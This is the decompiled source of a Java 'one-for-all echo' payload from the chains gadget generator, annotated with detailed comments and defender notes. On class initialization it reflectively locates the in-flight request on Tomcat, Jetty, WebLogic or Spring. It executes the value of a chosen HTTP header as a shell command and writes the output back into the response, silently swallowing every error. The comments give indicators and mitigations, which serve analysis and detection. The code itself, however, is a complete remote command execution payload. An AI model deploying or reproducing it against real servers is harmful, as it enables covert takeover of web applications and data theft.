package com.ar3h.chains.gadget.impl.bytecode.echo.template;

import cn.hutool.core.util.CharsetUtil;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.List;
import org.apache.velocity.servlet.VelocityServlet;
import org.apache.xalan.xsltc.compiler.Constants;

/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/bytecode/echo/template/OneForAllEchoBytecode.class */
/**
 * "One-for-all" request/response echo payload as emitted by the chains gadget generator
 * (decompiled class; see the {@code loaded from} note above). The static initializer at the
 * bottom of the class calls {@link #run()}, so everything below executes as a side effect of
 * class initialization — nothing has to invoke this class explicitly once it has been loaded.
 *
 * <p>What the visible code does: it probes which servlet container is on the classpath, uses
 * reflection to reach the HTTP request currently being processed, reads the value of the
 * request header named by {@link #header}, hands that value to {@link #exec(String)} (which
 * runs it through {@code sh -c} / {@code cmd.exe /c}), and writes the process output into
 * the HTTP response. Every failure along the way is swallowed by an empty
 * {@code catch (Exception)} block, so from the server's point of view the payload either
 * works or leaves no trace (unless {@link #debug} is set, in which case it prints
 * {@code [one-for-all-echo]} lines to stdout).
 *
 * <p>Defender notes (grounded in this source):
 * <ul>
 *   <li>Host indicators: a class whose static initializer ends up in {@code Runtime.exec};
 *       {@code setAccessible(true)} on {@code java.lang.ThreadGroup.threads} and
 *       {@code java.lang.Thread.threadLocals}; reflective walks of container internals
 *       ({@code target}, {@code this$0}, {@code global}, {@code processors}); the
 *       {@code [one-for-all-echo]} stdout markers.</li>
 *   <li>Network indicators: a request carrying an otherwise unused header whose value is a
 *       shell command line, answered with the command output in the body (on Tomcat the status
 *       is forced to 200 before writing).</li>
 *   <li>Mitigation: on JDK 16+ strong encapsulation makes the {@code setAccessible} calls on
 *       {@code java.base} internals throw {@code InaccessibleObjectException} unless
 *       {@code java.base/java.lang} has been opened to the caller; that exception is unchecked,
 *       so the catch blocks hide it and the Tomcat and Jetty paths silently do nothing. Keep
 *       blanket {@code --add-opens} flags out of production JVM arguments. The WebLogic and
 *       Spring paths do not touch {@code java.base} internals and are not blocked by this
 *       alone; the real fix is closing the deserialization / bytecode-loading gadget chain
 *       that lets this class be defined in the first place.</li>
 * </ul>
 *
 * <p>Decompiler artifact: the {@code CharsetUtil.GBK}, {@code Constants.TRANSLET_OUTPUT_PNAME}
 * and {@code VelocityServlet.REQUEST} references (imports from hutool, xalan and velocity) are
 * almost certainly the decompiler substituting string literals with identically-valued
 * constants from unrelated jars on its classpath — presumably the charset name {@code "GBK"}
 * and two Tomcat-internal field names. The original bytecode would not depend on those jars;
 * confirm against the constants' actual values before treating the imports as real dependencies.
 */
public class OneForAllEchoBytecode {
    // Enables the "[one-for-all-echo]" stdout traces in the methods below. Never assigned on this
    // page; presumably patched in by the generating tool. With the Java default it is false.
    public static boolean debug;
    // When true, run() returns after the first container-specific handler whose probe matched
    // (Jetty, WebLogic or Tomcat); when false the remaining handlers are tried as well.
    // Not assigned on this page.
    public static boolean once;
    // Name of the HTTP request header whose value is executed as a shell command. Not assigned on
    // this page; presumably supplied by the generating tool. If it stays null, the reflective
    // getHeader(null) calls below behave however the container handles a null header name.
    public static String header;

    /**
     * Entry point, invoked from the static initializer. Tries the container handlers in a fixed
     * order — Jetty, WebLogic, Tomcat, then Spring — each guarded by its {@code is*} classpath
     * probe. After Jetty, WebLogic and Tomcat, {@link #once} decides whether to stop; Spring is
     * always last and has no such check. The probes only test whether a marker class is
     * loadable, not whether the current thread is actually serving a request, so more than one
     * handler can run on a single pass.
     */
    public static void run() {
        if (isJetty()) {
            doJetty();
            if (once) {
                return;
            }
        }
        if (isWeblogic()) {
            doWeblogic();
            if (once) {
                return;
            }
        }
        if (isTomcat()) {
            doTomcat();
            if (once) {
                return;
            }
        }
        if (isSpring()) {
            doSpring();
        }
    }

    /**
     * Classpath probe: {@code true} iff Spring's {@code RequestAttributes} class can be loaded
     * with {@code Class.forName}; prints a trace first when {@link #debug} is set. Only
     * {@code Exception} is caught, so a {@code LinkageError} raised while loading the marker
     * class would propagate out of {@link #run()}.
     */
    public static boolean isSpring() {
        try {
            Class.forName("org.springframework.web.context.request.RequestAttributes");
            if (!debug) {
                return true;
            }
            System.out.println("[one-for-all-echo] [init] target is spring");
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    /**
     * Classpath probe for WebLogic ({@code weblogic.servlet.internal.ServletRequestImpl});
     * same structure and caveats as {@link #isSpring()}.
     */
    public static boolean isWeblogic() {
        try {
            Class.forName("weblogic.servlet.internal.ServletRequestImpl");
            if (!debug) {
                return true;
            }
            System.out.println("[one-for-all-echo] [init] target is weblogic");
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    /**
     * Classpath probe for Tomcat ({@code org.apache.catalina.startup.Bootstrap});
     * same structure and caveats as {@link #isSpring()}.
     */
    public static boolean isTomcat() {
        try {
            Class.forName("org.apache.catalina.startup.Bootstrap");
            if (!debug) {
                return true;
            }
            System.out.println("[one-for-all-echo] [init] target is tomcat");
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    /**
     * Classpath probe for Jetty ({@code org.eclipse.jetty.servlet.ServletContextHandler});
     * same structure and caveats as {@link #isSpring()}.
     */
    public static boolean isJetty() {
        try {
            Class.forName("org.eclipse.jetty.servlet.ServletContextHandler");
            if (!debug) {
                return true;
            }
            System.out.println("[one-for-all-echo] [init] target is jetty");
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    /**
     * Tomcat handler. Reaches the in-flight requests without holding a reference to any of them:
     * it enumerates the current thread group's private {@code threads} array, keeps threads whose
     * name contains {@code "http"} but not {@code "exec"}, and follows the reflective chain
     * {@code target -> this$0 -> <Constants.TRANSLET_OUTPUT_PNAME> -> global -> processors ->
     * <VelocityServlet.REQUEST>} down to the container's request objects (the two constant
     * references presumably stand for literal Tomcat field names; see the class comment). For the
     * first request carrying the {@link #header} header it forces status 200, runs the header
     * value through {@link #exec(String)} and writes the output with {@code doWrite(ByteChunk)},
     * falling back to {@code doWrite(ByteBuffer)} when that overload does not exist. Both loops
     * stop after the first successful write. Per-thread and overall failures are swallowed.
     *
     * <p>Defender note: on JDK 16+ the {@code setAccessible(true)} on
     * {@code ThreadGroup.threads} throws {@code InaccessibleObjectException} unless
     * {@code java.base/java.lang} is opened to the caller; that is a {@code RuntimeException},
     * so the outer catch hides it and this method becomes a no-op.
     */
    public static void doTomcat() {
        Field declaredField;
        Field declaredField2;
        try {
            // Set once a response has been written; used to break out of both loops below.
            boolean z = false;
            ThreadGroup threadGroup = Thread.currentThread().getThreadGroup();
            ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader();
            // Private java.lang.ThreadGroup.threads — the JDK 16+ encapsulation caveat applies here.
            Field declaredField3 = threadGroup.getClass().getDeclaredField("threads");
            declaredField3.setAccessible(true);
            for (Thread thread : (Thread[]) declaredField3.get(threadGroup)) {
                if (thread != null) {
                    try {
                        String name = thread.getName();
                        if (debug) {
                            System.out.println("[one-for-all-echo] [tomcat] thread name -> " + name);
                        }
                        // Threads named with "exec" are skipped; only "http" threads without it are walked.
                        if (!name.contains("exec") && name.contains("http")) {
                            Field declaredField4 = thread.getClass().getDeclaredField("target");
                            declaredField4.setAccessible(true);
                            Object obj = declaredField4.get(thread);
                            if (obj instanceof Runnable) {
                                // this$0 — the enclosing instance of the thread's Runnable.
                                Field declaredField5 = obj.getClass().getDeclaredField("this$0");
                                declaredField5.setAccessible(true);
                                Object obj2 = declaredField5.get(obj);
                                try {
                                    declaredField = obj2.getClass().getDeclaredField(Constants.TRANSLET_OUTPUT_PNAME);
                                } catch (NoSuchFieldException e) {
                                    // Not declared on the concrete class: look two superclasses up.
                                    declaredField = obj2.getClass().getSuperclass().getSuperclass().getDeclaredField(Constants.TRANSLET_OUTPUT_PNAME);
                                }
                                declaredField.setAccessible(true);
                                Object obj3 = declaredField.get(obj2);
                                try {
                                    declaredField2 = obj3.getClass().getSuperclass().getDeclaredField("global");
                                } catch (NoSuchFieldException e2) {
                                    declaredField2 = obj3.getClass().getDeclaredField("global");
                                }
                                declaredField2.setAccessible(true);
                                Object obj4 = declaredField2.get(obj3);
                                Field declaredField6 = obj4.getClass().getDeclaredField("processors");
                                declaredField6.setAccessible(true);
                                for (Object obj5 : (List) declaredField6.get(obj4)) {
                                    Field declaredField7 = obj5.getClass().getDeclaredField(VelocityServlet.REQUEST);
                                    declaredField7.setAccessible(true);
                                    Object obj6 = declaredField7.get(obj5);
                                    Object invoke = obj6.getClass().getMethod("getResponse", new Class[0]).invoke(obj6, new Object[0]);
                                    // The trigger: the raw value of the `header` request header is the command.
                                    String str = (String) obj6.getClass().getMethod("getHeader", String.class).invoke(obj6, header);
                                    if (str != null && !str.isEmpty()) {
                                        // Status is forced to 200 regardless of what the real handler would return.
                                        invoke.getClass().getMethod("setStatus", Integer.TYPE).invoke(invoke, 200);
                                        String exec = exec(str);
                                        try {
                                            // ByteChunk is resolved through the context loader without initializing it.
                                            Class<?> cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk", false, contextClassLoader);
                                            Object newInstance = cls.newInstance();
                                            // exec.getBytes() uses the platform default charset (called twice).
                                            cls.getDeclaredMethod("setBytes", byte[].class, Integer.TYPE, Integer.TYPE).invoke(newInstance, exec.getBytes(), 0, Integer.valueOf(exec.getBytes().length));
                                            invoke.getClass().getMethod("doWrite", cls).invoke(invoke, newInstance);
                                        } catch (NoSuchMethodException e3) {
                                            // No doWrite(ByteChunk) on this Tomcat: use the ByteBuffer overload instead.
                                            Class<?> cls2 = Class.forName("java.nio.ByteBuffer", false, contextClassLoader);
                                            invoke.getClass().getMethod("doWrite", cls2).invoke(invoke, cls2.getDeclaredMethod("wrap", byte[].class).invoke(cls2, exec.getBytes()));
                                        }
                                        z = true;
                                    }
                                    if (z) {
                                        break;
                                    }
                                }
                                if (z) {
                                    break;
                                }
                            }
                        }
                    } catch (Exception e4) {
                        // Any failure on this thread (missing field, inaccessible object, ...) is
                        // ignored and the next thread is tried.
                    }
                }
            }
        } catch (Exception e5) {
            // Swallowed: the handler leaves no trace when it cannot reach the request.
        }
    }

    /**
     * WebLogic handler. Asks the current thread for its {@code getCurrentWork()} object; if that
     * object's class name does not end in {@code ServletRequestImpl} it goes through
     * {@code connectionHandler.getServletRequest()} instead. Reads the {@link #header} header from
     * that request, runs it through {@link #exec(String)} and writes the output to the response
     * via {@code getServletOutputStream().writeStream(new StringInputStream(exec))}, then
     * {@code flush()}, then an empty {@code getWriter().write("")}. All reflective calls go
     * through {@link #getMethodAndInvoke}, which returns {@code null} on any failure, so a
     * broken link in the chain ends in one of the {@code null} checks rather than an exception.
     * Remaining failures are swallowed silently.
     */
    public static void doWeblogic() {
        try {
            Object methodAndInvoke = getMethodAndInvoke(Thread.currentThread(), "getCurrentWork", new Class[0], new Object[0]);
            if (methodAndInvoke == null) {
                if (debug) {
                    // The duplicated return below is a decompiler artifact; both branches return.
                    System.out.println("[one-for-all-echo] [weblogic] unknown error");
                    return;
                }
                return;
            }
            // Request object is either the work item itself or reached via its connectionHandler;
            // either way the `header` request header is read from it.
            Object methodAndInvoke2 = getMethodAndInvoke(methodAndInvoke.getClass().getName().endsWith("ServletRequestImpl") ? methodAndInvoke : getMethodAndInvoke(getFieldValue(methodAndInvoke, "connectionHandler"), "getServletRequest", new Class[0], new Object[0]), "getHeader", new Class[]{String.class}, new Object[]{header});
            if (methodAndInvoke2 == null) {
                if (debug) {
                    System.out.println("[one-for-all-echo] [weblogic] echo header is null");
                    return;
                }
                return;
            }
            // methodAndInvoke2 is non-null here, so toString() cannot yield null; the null check is redundant.
            String obj = methodAndInvoke2.toString();
            if (obj != null && !obj.isEmpty()) {
                String exec = exec(obj);
                if (debug) {
                    System.out.println("[one-for-all-echo] [weblogic] echo result -> " + exec);
                }
                Object methodAndInvoke3 = getMethodAndInvoke(methodAndInvoke, "getResponse", new Class[0], new Object[0]);
                Object methodAndInvoke4 = getMethodAndInvoke(methodAndInvoke3, "getServletOutputStream", new Class[0], new Object[0]);
                // Output is streamed through WebLogic's own StringInputStream wrapper.
                getMethodAndInvoke(methodAndInvoke4, "writeStream", new Class[]{InputStream.class}, new Object[]{Class.forName("weblogic.xml.util.StringInputStream").getDeclaredConstructor(String.class).newInstance(exec)});
                getMethodAndInvoke(methodAndInvoke4, "flush", new Class[0], new Object[0]);
                getMethodAndInvoke(getMethodAndInvoke(methodAndInvoke3, "getWriter", new Class[0], new Object[0]), "write", new Class[]{String.class}, new Object[]{""});
            }
        } catch (Exception e) {
            // Swallowed; see class comment.
        }
    }

    /**
     * Jetty handler. Walks the current thread's private {@code threadLocals} map (its
     * {@code table} array) and inspects each entry's {@code value}. A value whose class name ends
     * in {@code AsyncHttpConnection} (presumably older Jetty) is written through
     * {@code getPrintWriter("utf-8")}; one ending in {@code HttpConnection} is written through
     * {@code getHttpChannel().getResponse().getWriter()}, which is then flushed and closed. In
     * both cases the {@link #header} header is read from the associated request and
     * {@link #exec(String)}'s output is printed. The {@code null} passed as the parameter-type
     * and argument arrays in the reflective calls is a null varargs array, i.e. "no parameters".
     * Per-entry and overall failures are swallowed; the JDK 16+ encapsulation caveat from
     * {@link #doTomcat()} applies to {@code Thread.threadLocals} here as well.
     */
    public static void doJetty() {
        try {
            // Private java.lang.Thread.threadLocals (ThreadLocalMap) and its Entry[] table.
            Field declaredField = Thread.currentThread().getClass().getDeclaredField("threadLocals");
            declaredField.setAccessible(true);
            Object obj = declaredField.get(Thread.currentThread());
            Field declaredField2 = obj.getClass().getDeclaredField("table");
            declaredField2.setAccessible(true);
            Object[] objArr = (Object[]) declaredField2.get(obj);
            int i = 0;
            // Decompiled for-loop: every table slot is visited; there is no early exit on success.
            while (true) {
                if (i >= objArr.length) {
                    break;
                }
                Object obj2 = objArr[i];
                if (obj2 != null) {
                    try {
                        // Entry.value — the object stored in the thread local.
                        Field declaredField3 = obj2.getClass().getDeclaredField("value");
                        declaredField3.setAccessible(true);
                        Object obj3 = declaredField3.get(obj2);
                        if (obj3.getClass().getName().endsWith("AsyncHttpConnection")) {
                            Object invoke = obj3.getClass().getMethod("getRequest", null).invoke(obj3, null);
                            String str = (String) invoke.getClass().getMethod("getHeader", String.class).invoke(invoke, header);
                            if (str != null && !str.isEmpty()) {
                                // Written but not flushed/closed here, unlike the HttpConnection branch.
                                ((PrintWriter) obj3.getClass().getMethod("getPrintWriter", String.class).invoke(obj3, "utf-8")).println(exec(str));
                            }
                        } else if (obj3.getClass().getName().endsWith("HttpConnection")) {
                            Object invoke2 = obj3.getClass().getDeclaredMethod("getHttpChannel", null).invoke(obj3, null);
                            Object invoke3 = invoke2.getClass().getMethod("getRequest", null).invoke(invoke2, null);
                            String str2 = (String) invoke3.getClass().getMethod("getHeader", String.class).invoke(invoke3, header);
                            if (str2 != null && !str2.isEmpty()) {
                                String exec = exec(str2);
                                Object invoke4 = invoke2.getClass().getMethod("getResponse", null).invoke(invoke2, null);
                                PrintWriter printWriter = (PrintWriter) invoke4.getClass().getMethod("getWriter", null).invoke(invoke4, null);
                                printWriter.println(exec);
                                printWriter.flush();
                                printWriter.close();
                            }
                        }
                    } catch (Exception e) {
                        // Ignored; move on to the next thread-local entry.
                    }
                }
                i++;
            }
        } catch (Exception e2) {
            // Swallowed; see class comment.
        }
    }

    /**
     * Spring handler. Uses {@code RequestContextHolder.getRequestAttributes()} — a thread-bound
     * lookup, so this only finds a request when the current thread is the one serving it —
     * then obtains request and response through {@code ServletRequestAttributes}' getters,
     * reads the {@link #header} header and writes {@link #exec(String)}'s output to the
     * response writer, flushing and closing it. When {@code getRequestAttributes()} returns
     * {@code null}, {@code method.invoke(null, ...)} on an instance method throws, and the
     * empty catch swallows that like everything else.
     */
    public static void doSpring() {
        try {
            Object invoke = Class.forName("org.springframework.web.context.request.RequestContextHolder").getMethod("getRequestAttributes", new Class[0]).invoke(null, new Object[0]);
            Class<?> cls = Class.forName("org.springframework.web.context.request.ServletRequestAttributes");
            Method method = cls.getMethod("getRequest", new Class[0]);
            Method method2 = cls.getMethod("getResponse", new Class[0]);
            Object invoke2 = method.invoke(invoke, new Object[0]);
            Object invoke3 = method2.invoke(invoke, new Object[0]);
            // The trigger header, read from the current request.
            String str = (String) invoke2.getClass().getMethod("getHeader", String.class).invoke(invoke2, header);
            if (str != null && !str.isEmpty()) {
                PrintWriter printWriter = (PrintWriter) invoke3.getClass().getMethod("getWriter", new Class[0]).invoke(invoke3, new Object[0]);
                printWriter.write(exec(str));
                printWriter.flush();
                printWriter.close();
            }
        } catch (Exception e) {
            // Swallowed; see class comment.
        }
    }

    /**
     * Finds a declared method by name and parameter types, walking up the superclass chain, and
     * makes it accessible. {@code cls = null} is the loop-exit signal once a lookup succeeds.
     * Any exception — not only {@code NoSuchMethodException} — moves the search to the
     * superclass; note that if {@code getDeclaredMethod} succeeds but {@code setAccessible}
     * throws, {@code method} keeps the (non-accessible) match while the search continues upward.
     *
     * @param cls    class to start from; may be {@code null}, in which case {@code null} is returned
     * @param str    method name
     * @param clsArr exact parameter types
     * @return the matching method, or {@code null} if no class in the hierarchy declares it
     */
    public static Method getMethodByClass(Class<?> cls, String str, Class<?>[] clsArr) {
        Method method = null;
        while (cls != null) {
            try {
                method = cls.getDeclaredMethod(str, clsArr);
                method.setAccessible(true);
                cls = null;
            } catch (Exception e) {
                cls = cls.getSuperclass();
            }
        }
        return method;
    }

    /**
     * Reflectively invokes {@code str} on {@code obj} via {@link #getMethodByClass}. Returns
     * {@code null} when the method is not found, when the invocation throws, or when
     * {@code obj} itself is {@code null} (the {@code obj.getClass()} NPE is caught too). Callers
     * such as {@link #doWeblogic()} chain these calls, so a {@code null} silently propagates
     * through the chain instead of failing loudly.
     *
     * @param obj    target instance
     * @param str    method name
     * @param clsArr exact parameter types
     * @param objArr arguments
     * @return the method's return value, or {@code null} on any failure
     */
    public static Object getMethodAndInvoke(Object obj, String str, Class<?>[] clsArr, Object[] objArr) {
        try {
            Method methodByClass = getMethodByClass(obj.getClass(), str, clsArr);
            if (methodByClass != null) {
                return methodByClass.invoke(obj, objArr);
            }
            return null;
        } catch (Exception e) {
            return null;
        }
    }

    /**
     * Reads the field named {@code str} from {@code obj}, searching up the superclass chain and
     * forcing accessibility. If {@code obj} is itself a {@link Field}, that field is used
     * directly and read from the {@code Field} object — an odd branch whose intent is unclear
     * from this source; the only caller on this page passes a plain object.
     *
     * @param obj target instance (must not be {@code null}: {@code obj.getClass()} would NPE)
     * @param str field name
     * @return the field value, or {@code null} if no class in the hierarchy declares the field
     * @throws Exception from {@code setAccessible}/{@code get}; lookup exceptions are swallowed
     */
    public static Object getFieldValue(Object obj, String str) throws Exception {
        Field field = null;
        if (obj instanceof Field) {
            field = (Field) obj;
        } else {
            Class<?> cls = obj.getClass();
            while (cls != null) {
                try {
                    field = cls.getDeclaredField(str);
                    cls = null;
                } catch (Exception e) {
                    cls = cls.getSuperclass();
                }
            }
        }
        if (field == null) {
            return null;
        }
        field.setAccessible(true);
        return field.get(obj);
    }

    /**
     * Drains {@code inputStream} to EOF into a byte array using a 16 KiB buffer. The
     * {@code flush()} on the {@code ByteArrayOutputStream} is a no-op; the input stream is not
     * closed by this method.
     *
     * @param inputStream stream to read
     * @return every byte read until EOF
     * @throws IOException if a read fails
     */
    private static byte[] readAllBytes(InputStream inputStream) throws IOException {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        byte[] bArr = new byte[16384];
        while (true) {
            int read = inputStream.read(bArr, 0, bArr.length);
            if (read == -1) {
                byteArrayOutputStream.flush();
                return byteArrayOutputStream.toByteArray();
            }
            byteArrayOutputStream.write(bArr, 0, read);
        }
    }

    /**
     * The command-execution sink. Runs {@code str} verbatim through the platform shell —
     * {@code cmd.exe /c} when {@code os.name} contains {@code "win"} (case-insensitive),
     * otherwise {@code sh -c} — and returns whatever the process wrote to stdout, or to stderr
     * if stdout was empty, decoded with {@code CharsetUtil.GBK} (presumably the charset name
     * {@code "GBK"}; see the class comment on decompiler substitutions). Every caller passes a
     * raw HTTP header value in here with no validation; that header value is what a detection
     * rule should key on.
     *
     * <p>The process exit is not awaited and stderr is not drained while stdout is being read.
     * On any exception the exception message (which may be {@code null}) is returned instead of
     * output, so callers cannot tell failure from a successful run.
     *
     * @param str shell command line taken from the request header
     * @return process output (stdout, else stderr) or the exception message
     */
    public static String exec(String str) {
        try {
            // z == true means "not Windows" -> sh -c; false -> cmd.exe /c.
            boolean z = true;
            String property = System.getProperty("os.name");
            if (property != null && property.toLowerCase().contains("win")) {
                z = false;
            }
            Process exec = Runtime.getRuntime().exec(z ? new String[]{"sh", "-c", str} : new String[]{"cmd.exe", "/c", str});
            byte[] readAllBytes = readAllBytes(exec.getInputStream());
            if (readAllBytes.length == 0) {
                readAllBytes = readAllBytes(exec.getErrorStream());
            }
            return new String(readAllBytes, CharsetUtil.GBK);
        } catch (Exception e) {
            return e.getMessage();
        }
    }

    // Class-initialization trigger: merely initializing this class (for example when a gadget
    // chain defines and instantiates it) runs the whole echo flow above. Exceptions are swallowed
    // inside run()'s callees, but an Error escaping from run() would surface at the load site as
    // a class-initialization failure.
    static {
        run();
    }
}
